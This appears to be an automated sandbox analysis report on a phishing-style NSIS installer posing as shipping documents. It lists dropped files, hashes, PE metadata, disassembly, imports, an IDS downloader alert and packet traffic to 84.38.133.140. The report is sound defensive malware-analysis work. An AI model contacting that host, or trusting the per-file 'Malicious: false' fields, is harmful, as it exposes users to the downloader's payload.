SHA-256:	90FB3C43A3B66B03536AE88D161B53235B2EB4D442434F9D29D9C8E7201BAF5B
SHA-512:	E8F633C24C4FA70261166F35231CEF05C8ADD02F2832554196195FABD1DA6FDE2D416A0CBC72AB99C5E1234B5CE36354282B2751ED40E9EF14F4E10C92C912BC
Malicious:	false
Preview:	..7.............................................................a.....................................+.................R.X..........6j............................................................r.....................................................................................................!..................%....c................z..................K...................................................................................................V.........................^................. ....................t.................x..................................................................................................................'................................a...............l........N.......Y....<..........................................s.............................................................................E..............f...................=..................................................................................................r.................

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\formellommeregneren.jul

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	data
Category:	dropped
Size (bytes):	382625
Entropy (8bit):	1.2393915733719494
Encrypted:	false
SSDEEP:	768:0DJAAEHvN8DLngKAGkZUiUb1jAsxj4xcPZqxc6HygOiI4TFyC3+JU6X2a49ybWb8:iMjZiWvU9QezjY44rg1dW2nU9DMMu
MD5:	02908F4CEC5A85D4DEC74585A42043DB
SHA1:	C13DE5F26A54B7FAF33BCD7C00D545449B454F1C
SHA-256:	EE908BB9AA322F1CCEA9F114EBD9DBEF64F090A58A8C3D87429CF47BDBB10828
SHA-512:	91D5A645EF9DB223ADB0D866375F2E3D572574622D396C70B656D9406ECE5651D13BE5696F4686282B79E821D04E59FF301C9C9B2A7FED0402A4DC5B40517BAE
Malicious:	false
Preview:	.......................................................H........Z..........................................................:....P.......7...........................................k.................................N...t.....................................................................................J........................................................n.................................x...&.................................!.......................r............H...................../....`.........g...................................................................................................................5...q.............r...0........................B..4......................4.....................Id.............5...............................................................................=.............0...............w.R........................Q.............................................................................................8...................................

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\noncomputation.ove

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	data
Category:	dropped
Size (bytes):	76421
Entropy (8bit):	1.2222919230650398
Encrypted:	false
SSDEEP:	384:dBg6IMwdyffAJAqH4iCVrQ4WEPPJ4hl7aXOVyyz+o4iBMWMTjV8i/dugYAxzc4bd:tzZo4ZV7WFz3z6iCAyR5g4SA
MD5:	5C6BD17741F5F2496614FA289627A551
SHA1:	45C09D535F37F35545B9804E4E4ED4D376B8F7C0
SHA-256:	AB4D739E02B2053D47C00B10CEC91AE148D1D65E6E2DE11E44FFF98B4E7108E5
SHA-512:	1BD44CE6A0DAE092F43B64BDC80DFD82CBA409C377CC48208BBD8946C76588B0A5D9D7E5F8AFF0E8EEB4CA4BA37EF5570A95064C078AE2466B1D9F14A8D9D7D7
Malicious:	false
Preview:	..........................B......................u................6.......R..........L.....................R....c.....................................................................................................U....................b...........q.......................................................................).........M.............................................6.....................................................................................................................G..........................................................................;.....................h....................................................h........................................................c............................u...............>.................[.....................................................'.........,.......................................................I.'+..................................L...................,.....................o.....?..............................

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\sedulousness.hal

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	data
Category:	dropped
Size (bytes):	393334
Entropy (8bit):	1.2532534898634065
Encrypted:	false
SSDEEP:	768:UHwnuiqrFqFhqA6XogdSKbMj1/6faExHnbj/wXdmWpsnXg3xlGpQIrxHCHh1BDxC:f8bUkN0isFeoig2MDY
MD5:	F679C6C7F0157B73FA577E78F8C0B147
SHA1:	B3AFCE7C58ABC0DA074EB3DF3C1751B30CFB1FC1
SHA-256:	A03B4AD55B7CBEF596BABDF0CCCE2618E988D404C80F41BE4B47F476A7D7DDD6
SHA-512:	4DE9098C7FEA9BF2A8934D18BE7F2B2E99A08E19C301F50E68ED6B66E64C8CC5FFFD61B3B53601B34A92D46E8EE5917533163695E3C2DC1BBA6DF37DD4DB09BF
Malicious:	false
Preview:	..........L......%.......Q...................:......................-.........................................?................U......0....D.................................................V..........................`...................................M.................o...............................<....................................................)._....H................T....................................*..........................M.................D........7.............U.............6....................................................................................Z..........................................................................................Q..F............................L.....................n...................X...........................Z...........................<.............U..........................................................................................................g............4..............................................n..............

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\subjects.pos

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	data
Category:	dropped
Size (bytes):	88304
Entropy (8bit):	1.240297499899016
Encrypted:	false
SSDEEP:	384:Ofcl7NdHEZYLU8+v9H0UrKtGr80B6nusuxr0S+Ix7f1L1+Y8wnKnWHjJvc5M2Er7:Ofui4QasIPc6uMc7z+7wXHFviJazUI
MD5:	EA91F0D17239D9E7335361E7814A76F0
SHA1:	C8F63FEB9BB27C6523E87C4BCD3285500F4D5988
SHA-256:	048A9879E1979B8318C9E11D87485720DE2786F93A13DAED316BCE83F6B1E8ED
SHA-512:	076888DACFB76AAC2BF73EA349034C527E5C45147AF5CEBC358CD2D30E4CA313B112B24216B51FDACCC709DD02BEE1A8EF8003AAB8CF773D9174E770E66E490C
Malicious:	false
Preview:	..............................................................................................................................................{....-.....#.............................Y......................................................s/............!/.C................$..................................................q......*...............................................=...............................o........X..............X....................................................j.....................................................;............................................<...,...........R..................................................$.....................................V............................................................m.......................................".........b....................L.......................................................$.............,............'............._...............................................................................

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\villagy.txt

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	411
Entropy (8bit):	4.289862470065085
Encrypted:	false
SSDEEP:	12:MnhKnnEOc3JgEVEIz8C79mrEZbzO/QlRcguh+5hS:MhsN+lVzb9m4lznlqh+5hS
MD5:	ED70CF38573C4ED87CA2682FA10EC078
SHA1:	A91CDA86E2E30183F18C81FC1F4DBCD22E9766A6
SHA-256:	64993FDC7B83E3AF82A6D1C7E2D930AB69BFAD07BB9959F480B3E066053282B3
SHA-512:	928D5D5E2BB7142F67C097637824CA8B0030BA7E0A238EB80D9B83E4CCE7A255CBFAF7324FBF72FC1446BD43F2C63B109ED43A262E0DA30A96FE7DCE083C6E99
Malicious:	false
Preview:	withstand tursejlere unindicative nummerering syfilitiker juncaginaceae pastourelle candyflosss..rutherford tossehoveder hamsternes agelaus hoveller,funori shags yurucari akkoladen forkalkende fraveges fodrings sanerer rengringsdamernes kbesummens lurk..grsrytter udsortere remedium unchurn algebraernes.liberalities nonappealability byggegrundenes farde.vadskken easeful opsendelserne corporosity sociopathic..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.186153453421366
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Shipping documents 000309498585956000797900.exe
File size:	1'081'112 bytes
MD5:	94c700b33fb2a1aa2bd02f13750cca75
SHA1:	abe3abd4f60778dfa694a8fc54b9d1037a248132
SHA256:	9f40759902174555ab1294eb92ae2d17ad2698d2e0e68694edbb9684bdab7692
SHA512:	b1962793a313490385ce265763a05585abf1793336ffbbb853fc64b6807e35ec98b28daebe147f98bb901a804ce88bc930c33b7938f31b51b9c9a0c258decc5a
SSDEEP:	12288:5faWYFsj2FYoIAyPn4/SLfP2Udh1rtZJi3l/zSL6WKuwpbt+jBL/nepC:ldeXi4/42Up5KV/zSOWlabAjNnKC
TLSH:	C63512417A56C8B7E8C319300834CAFB95716CD659E89B1BBF697F4F9C39382CE19248
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r.........

File Icon


Icon Hash:	933519dbb93f1993

Static PE Info

General

Entrypoint:	0x4036fc
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63132B9B [Sat Sep 3 10:25:31 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Nematelminth Superpatriotism Resubmission ", E=Cnidocell170@Dentalhygiejnen.Ov, L=Glengalmadale, S=Scotland, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	26/02/2024 02:01:05 25/02/2027 02:01:05
Subject Chain	CN="Nematelminth Superpatriotism Resubmission ", E=Cnidocell170@Dentalhygiejnen.Ov, L=Glengalmadale, S=Scotland, C=GB
Version:	3
Thumbprint MD5:	D8D6C2692AECFAD90EA9731D9C6CCEA9
Thumbprint SHA-1:	77EE7D4AAAADD9DF76DD881DB4FDFEB132F771E9
Thumbprint SHA-256:	894BD449F28ECFD126807ED0DAA4370DC0F6AE0F1F14223DEA83C5B45E16E76A
Serial:	558170F9F7BC914C4C2A1F773077F634CD991888

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00409528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [00409170h]
mov esi, dword ptr [004090ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007FD910DB3EF9h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007FD910DB3ED3h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007FD910DB3ECDh
xor eax, eax
jmp 00007FD910DB3EB4h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007FD910DB3ECDh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007FD910DB3EC6h
mov eax, dword ptr [esp+38h]
mov dword ptr [00435AF8h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b0c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x6af88	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x107518	0xa00
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7032	0x7200	3668d67c78869a28f70344e1d8e85519	False	0.6497395833333334	data	6.41220875237026	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x19a2	0x1a00	fbd4c7eabd4e063addfc684ff44628c8	False	0.455078125	data	5.04107190530894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x2ab00	0x200	d11ee5d02bcd95455113cdebfc4a87a5	False	0.30078125	data	2.035495984906757	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x1e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x54000	0x6af88	0x6b000	aa43e7b6e08a642a9aeb746269e47e45	False	0.1785420925817757	data	2.026791894263343	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x54388	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144	English	United States	0.12347619611208095
RT_ICON	0x963b0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.1306932450017745
RT_ICON	0xa6bd8	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.1354057178894261
RT_ICON	0xb0080	0x5d35	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9851221658773731
RT_ICON	0xb5db8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.14525271610769958
RT_ICON	0xb9fe0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.15612033195020747
RT_ICON	0xbc588	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.18761726078799248
RT_ICON	0xbd630	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.20614754098360655
RT_ICON	0xbdfb8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.24113475177304963
RT_DIALOG	0xbe420	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0xbe540	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xbe660	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0xbe728	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xbe788	0x84	data	English	United States	0.7045454545454546
RT_VERSION	0xbe810	0x348	data	English	United States	0.4642857142857143
RT_MANIFEST	0xbeb58	0x42e	XML 1.0 document, ASCII text, with very long lines (1070), with no line terminators	English	United States	0.514018691588785

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll	SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll	WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T18:34:24.433199+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49714	84.38.133.140	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 18:34:23.777945995 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:23.783194065 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:23.783283949 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:23.783452988 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:23.788336992 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.433077097 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.433130026 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.433163881 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.433192968 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.433198929 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.433226109 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.433258057 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.433310032 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.433391094 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.513298035 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513334990 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513367891 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513400078 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513457060 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513485909 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513501883 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.513520002 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513552904 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513603926 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.513643980 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.513715982 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.519493103 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.519527912 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.519561052 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.519602060 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.519680023 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.593882084 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.593919992 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.593974113 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.594007015 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.594022989 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.594063044 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.594095945 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.594098091 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.594095945 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.594126940 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.594136000 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.594146013 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.594189882 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.594705105 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.594796896 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.599967957 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600022078 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600070953 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600080013 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.600105047 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600138903 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600249052 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.600249052 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.600357056 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600461006 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600500107 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.600565910 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600584030 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.600629091 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600640059 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.600663900 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600697994 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.600749016 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.600827932 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.674880981 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.674932957 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.674983978 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675014973 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675046921 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675065994 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.675193071 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.675297976 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675348043 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675379038 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.675379992 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675470114 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.675518990 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.675738096 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675786972 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675817013 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.675826073 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.675911903 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.680408955 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.680459976 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.680490017 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.680497885 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.680598974 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.680629969 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.680663109 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.680695057 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.680701971 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.680788994 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.680984020 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.681034088 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.681065083 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.681071043 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.681099892 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.681132078 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.681154013 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.681231976 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.681938887 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.681994915 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.682025909 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.682029009 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.682061911 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.682094097 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.682107925 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.682188988 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.686846018 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.686881065 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.686914921 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.686954975 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.686961889 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.687006950 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.687015057 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.687047958 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.687079906 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.687110901 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.687113047 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.687144995 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.687189102 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.687233925 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.755568027 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.755637884 CEST	80	49714	84.38.133.140	192.168.2.5
